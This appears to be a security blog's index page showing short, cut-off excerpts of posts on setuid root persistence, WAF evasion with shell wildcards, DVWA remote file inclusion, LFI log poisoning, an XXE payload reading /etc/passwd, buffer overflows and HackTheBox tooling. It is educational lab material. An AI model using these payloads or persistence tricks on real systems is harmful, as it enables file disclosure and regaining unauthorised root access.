AvasDream

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job. I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account from the system (including www-data, which you might not even know if compromised).

If the "setuid bit" (or flag, or permission mode) is set for executable, the operating system will run not as the cur

AvasDream

Raspberry Pi 3 Hardware Setup:

Burn Raspbian Lite to micro SD using dd if=/patch/tp/image of=/path/to/sd/card bs=512 if you are on windows use Etcher. Raspbian Image Download

First configuration of Raspberry Pi:

Note: Not covered is a static IP adress for your raspberry! Check how to do this with your local Router.

Configure Keyboard Layout etc. with raspi-config and change the default password (pi/raspberry). Last but not least enable the SSH Service with

AvasDream

Web Application Firewall Evasion

# One char wildcard
?
# Multiple char wildcard
*


/bin/ls
/???/?s

AvasDream

Remote file inclusion

URL: /dvwa/vulnerabilities/fi/?page= [YOUR REMOTE URL]

Condition in /etc/php5/cgi/php.ini:

allow_url_fopen = On
allow_url_include = On

Sometimes you need the NULL-Terminator (%00):

AvasDream

Setting up Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications.

First we have to add the Burp Suite Proxy in our Browser:

Settings -> Advanced Settings -> Network Tab -> Add manual Proxy Now enter the default values for Burp Suite 127.0.0.1:8080. Dont forget to check the box "Use this proxy server for all protocols".

Now we disable the captive portal of firefox. We are doing this to reduce the traffic we will see in our proxy.

AvasDream

Purpose

Cheatsheet for HackTheBox with common things to do while solving these CTF challenges.

Because a smart man once said:

Never google twice.

Linux General

AvasDream

Prerequisites

1. LFI Vulnerability
2. Access to the Error or Access Log of the Server.

Example Log Entry

127.0.0.1 "GET /apache_pb.gif HTTP/1.0" "http://www.example.com/start.html" "Mozilla/4.08 [en] (Win98; I ;Nav)"

In this entry we see Header Information "Mozilla/4.08 [en] (Win98; I ;Nav)" from a GET Request and this is the place where we add our code.

AvasDream

Basics

Source

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
 mypass

AvasDream

Introduction

To better grasp the understanding of Bufferoverflows I decided to make and document some exercises with this topic.

The exploit exercises are mainly from exploit-exercises.com.

Stackoverflow - When the execution stack grows beyond the memory that is reserved for it

Bufferoverflow - When a programm writes beyond the end of the memory allocated for any buffer (Heap & Stack).

AvasDream

Script for easier installation of Kali tools

Missing Browser Extensions!

• Built with
• Foxy Proxy
• Cache Cleaner
• Adblocker

Manual execution of install Scripts for Veil and Empire needed.

#! /bin/bash